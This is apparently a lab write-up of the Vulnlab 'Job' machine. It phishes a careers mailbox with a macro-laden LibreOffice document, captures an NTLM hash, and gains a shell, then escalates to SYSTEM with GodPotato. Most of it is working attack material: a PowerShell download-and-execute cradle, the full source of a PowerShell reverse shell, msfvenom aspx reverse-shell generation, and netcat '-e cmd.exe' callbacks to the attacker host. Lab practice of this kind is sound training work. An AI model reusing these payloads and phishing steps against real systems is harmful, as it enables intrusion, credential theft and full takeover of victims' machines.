vulnlab-job
nmap scan
PORT STATE SERVICE VERSION 25/tcp open smtp hMailServer smtpd | smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Job.local | http-methods: |_ Potentially risky methods: TRACE 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: JOB | NetBIOS_Domain_Name: JOB | NetBIOS_Computer_Name: JOB | DNS_Domain_Name: job | DNS_Computer_Name: job | Product_Version: 10.0.20348 |_ System_Time: 2024-06-28T14:15:10+00:00 | ssl-cert: Subject: commonName=job | Not valid before: 2024-06-27T12:41:55 |_Not valid after: 2024-12-27T12:41:55 Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 311: |_ Message signing enabled but not required | smb2-time: | date: 2024-06-28T14:15:12 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
cat /etc/hosts | grep job
10.10.114.36 job.local
website shows one email: career@job.local
Also, it states that if you are sending your resume, it should be as a libre office document
Phishing try1 getting some windows hashes
1st generata a msf payload
use auxiliary/fileformat/odt_badodt set LHOST tun0 run
then send a mail, and catch the hashes received
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job] └─$ impacket-smbserver -smb2support share . Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.99.156,51049) [*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB) [*] User JOB\jack.black authenticated successfully [*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000 [*] Closing down connection (10.10.99.156,51049) [*] Remaining connections [] [*] Incoming connection (10.10.99.156,51050) [*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB) [*] User JOB\jack.black authenticated successfully [*]
The hash was uncrackable with john and rockyou.txt
.
Seems phishing is the way to go. So what I did is the following.
The following write-up provides a very good example on how to do this:
https://0xdf.gitlab.io/2020/02/01/htb-re.html
msf6 > set payload windows/x64/exec payload => windows/x64/exec msf6 > set LHOST 10.8.2.138 LHOST => 10.8.2.138 msf6 > set LPORT 80 LPORT => 80 msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');" cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');
shell.txt
┌──(puck㉿kali)-[~/vulnlab/job] └─$ cat shell.txt function cleanup { if ($client.Connected -eq $true) {$client.Close()} if ($process.ExitCode -ne $null) {$process.Close()} exit} // Setup IPADDR $address = '10.8.2.138' // Setup PORT $port = '443' $client = New-Object system.net.sockets.tcpclient $client.connect($address,$port) $stream = $client.GetStream() $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize $process = New-Object System.Diagnostics.Process $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $process.StartInfo.RedirectStandardInput = 1 $process.StartInfo.RedirectStandardOutput = 1 $process.StartInfo.UseShellExecute = 0 $process.Start() $inputstream = $process.StandardInput $outputstream = $process.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; $testing = 0; while (-not $done) { if ($client.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($networkbuffer,0,$pos) $inputstream.write($string) start-sleep 1 if ($process.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($outputstream.Read()) while($outputstream.Peek() -ne -1){ $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}
msf6 exploit(multi/misc/openoffice_document_macro) > show options Module options (exploit/multi/misc/openoffice_document_macro): Name Current Setting Required Description ---- --------------- -------- ----------- BODY no The message for the document body FILENAME msf.odt yes The OpenOffice Text document name SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/x64/exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD powershell.exe -nop -w hidden -ep bypa yes The command string to execute ss -c IEX(New-Object Net.WebClient).Do wnloadString('http://10.8.2.138/shell. txt'); EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) Exploit target: Id Name -- ---- 0 Apache OpenOffice on Windows (PSH) View the full module info with the info, or info -d command. msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80 srvport => 80 msf6 exploit(multi/misc/openoffice_document_macro) > run [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. msf6 exploit(multi/misc/openoffice_document_macro) > [*] Using URL: http://10.8.2.138/7Jnb1x3 [*] Server started. [*] Generating our odt file for Apache OpenOffice on Windows (PSH)... [*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic [*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard [*] Packaging file: Basic/Standard/Module1.xml [*] Packaging file: Basic/Standard/script-lb.xml [*] Packaging file: Basic/script-lc.xml [*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2 [*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator [*] Packaging file: Configurations2/accelerator/current.xml [*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF [*] Packaging file: META-INF/manifest.xml [*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails [*] Packaging file: Thumbnails/thumbnail.png [*] Packaging file: content.xml [*] Packaging file: manifest.rdf [*] Packaging file: meta.xml [*] Packaging file: mimetype [*] Packaging file: settings.xml [*] Packaging file: styles.xml [+] msf.odt stored at /home/puck/.msf4/local/msf.odt exit [*] Server stopped. [*] Server stopped. ┌──(puck㉿kali)-[~/vulnlab/job] └─$ cp /home/puck/.msf4/local/msf.odt. now the mailicious odtis downloaded ┌──(puck㉿kali)-[~/vulnlab/job] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 - ──(puck㉿kali)-[~/vulnlab/job] └─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully! ┌──(puck㉿kali)-[~/vulnlab/job] └─$ rm 7Jnb1x3 └─$ cp cp shell.txt 7Jnb1x3 run again ! sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138> Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully! now the shell is downloaded ┌──(puck㉿kali)-[~/vulnlab/job] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 - 10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -
And we catch the shell as user
┌──(puck㉿kali)-[~/vulnlab/job] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139 Microsoft Windows [Version 10.0.20348.350] (c) Microsoft Corporation. All rights reserved. C:\Program Files\LibreOffice\program>whoami job\jack.black c:\Users\jack.black\Desktop>type user.txt VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir Directory: C:\inetpub\wwwroot Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/10/2021 8:52 PM aspnet_client d----- 11/9/2021 9:24 PM assets d----- 11/9/2021 9:24 PM css d----- 11/9/2021 9:24 PM js -a---- 11/10/2021 9:01 PM 298 hello.aspx -a---- 11/7/2021 1:05 PM 3261 index.html PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx
Privesc
After checking files on folders on this machine, I noticed that inetpub/wwwroot will allow us to upload files to the website
I created a aspx revshell with
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx
ant then did a curl http://job.local/reverse.aspx , to get a new shell
┌──(puck㉿kali)-[~/vulnlab/job] └─$ nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689 Microsoft Windows [Version 10.0.20348.350] (c) Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami iis apppool\defaultapppool c:\windows\system32\inetsrv>cd c:\temp cd c:\temp c:\temp>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" [*] CombaseModule: 0x140720521084928 [*] DispatchTable: 0x140720523675512 [*] UseProtseqFunction: 0x140720522968944 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper [*] Trigger RPCSS [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835 [*] DCOM obj OXID: 0x7374a001401060e1 [*] DCOM obj OID: 0x734f5c52566383ce [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 988 Token:0x732 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 3552
and we have a admin shell
SeImpersonatePrivilege is enabled. , so we used GodPotato
┌──(puck㉿kali)-[~/vulnlab/job] └─$ nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837 Microsoft Windows [Version 10.0.20348.350] (c) Microsoft Corporation. All rights reserved. C:\temp>whoami whoami nt authority\system c:\Users\Administrator\Desktop>type root.txt type root.txt VL{0102<REDACTED>5152}
We now have a Admin reverse shell.